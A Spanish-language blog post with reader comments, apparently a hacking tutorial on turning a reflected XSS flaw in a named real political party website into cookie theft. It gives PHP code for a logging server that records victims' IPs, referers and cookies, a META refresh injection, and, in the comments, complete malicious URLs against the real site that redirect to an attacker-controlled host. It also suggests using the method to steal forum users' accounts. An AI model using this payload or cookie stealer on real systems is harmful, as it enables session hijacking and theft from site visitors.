Supongo que os acordareis del anterior post sobre ataque a la URL del server y lo probamos en la página del pp en castellón, aparte de para echarnos unas risas este ataque no tenia ningún tipo de peligro, de momento...
Lo que haremos en este tutorial será sacarle mas provecho a esta vuln y conseguir las cookies de los usuarios de la página, podremos ver cosas como su ip, la fecha y hora en la que entraron en la página vuln y sus cookies, LO MAS IMPORTANTE!
Las cookies es por decirlo de alguna manera la información sobre el usuario que se queda guardada en su pc, y en ellas puede contener información de todo tipo, asta contraseñas.
Empezaremos por crear un servidor web. Esto parece muy complicado pero no lo es, simplemente accediendo a la web 000webhost y registrándonos obtendremos nuestro server, así de fácil.
Cuando ya lo tengamos todo, accederemos a nuestro server dándole a Go to Cpanel:
Ahora le daremos a file manager:
Ingresamos nuestro pass y ya estaremos dentro.
Una vez dentro le daremos a la carpeta que pone public html
Y eliminamos todos los archivos que hay dentro (click en el check box y le damos a delete, como en el correo :)
Ahora creamos un nuevo archivo dándole a new file:
En New file name ponemos index.html y ponemos dentro el siguiente código:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
Lo que hace esto es mostrar un mensaje de error 404 pagina no encontrada y las cookies, la ip, la fecha y el sitio de procedencia, se quedan guardados dentro de log.txt
log.txt se quedará guardado en la carpeta de public html y podremos consultarlo cuando queramos dandole a view.
El funcionamiento es simple, cuando la víctima se conecte al servidor del pp mediante la URL maliciosa, será redireccionado a nuestro server, y sus cookies se quedarán guardadas en log.txt
Código para redireccionar a una web:
<META HTTP-EQUIV="Refresh" CONTENT="3; URL=tu web">
Acordaros que para instertarlo teniamos que poner "> para salir del input!
La URL maliciosa quedaria así:
Bueno esto es solo un ejemplo pero si descubris algun XSS de inyección por la URL en un foro podria ser muy útil para sacar los usuarios del foro.
Acabo este post riendome un poco de las personas que creen que XSS es una vulnerabilidad de poco riesgo. PUES SE EQUIVOCAN!
Salu2 anónimo!
Existe una pagina la cual ase algo similar a esto solo que la pagina no esta creada en "000webhost" y lo único que debes hacer es ingresar tu correo (Puede que solo quieran robar correos) una vez ingresado la pagina te generara una URL que puedes pasar a tus "victimas" y te llegara a tu correo la IP, la hora y fecha en que entro muy similar a esto ;) pero prefiero esta tecnica ( la tuya) ya que el servidor sera confiable ya que lo crearemos nosotros mismos. ;) Buen post.
ResponderEliminaramigo no entiendo algo me podrias ayudar
ResponderEliminarNo sirve hombre, he echo tal y como dices y le he dado el permiso a log.txt de escribir y solo me vota la ip y la hora pero las cookies no quedan guardadas, podrias ayudarme,gracias.
ResponderEliminarhttp://www.ppcastellon.es/index.php?idioma=es&menu=4&pagina=1&opcion=2&ruta[0]=1&buscartexto=%22%3E%3CMETA%20HTTP-EQUIV=%22Refresh%22%20CONTENT=%223;%20URL=http://reflecioness.net23.net/%22%3E&x=16&y=22
ResponderEliminarwww.blogspot.com/http://www.ppcastellon.es/index.php?idioma=es&menu=4&pagina=1&opcion=2&ruta[0]=1&buscartexto=%22%3E%3CMETA%20HTTP-EQUIV=%22Refresh%22%20CONTENT=%223;%20URL=http://reflecioness.net23.net/%22%3E&x=16&y=22
ResponderEliminar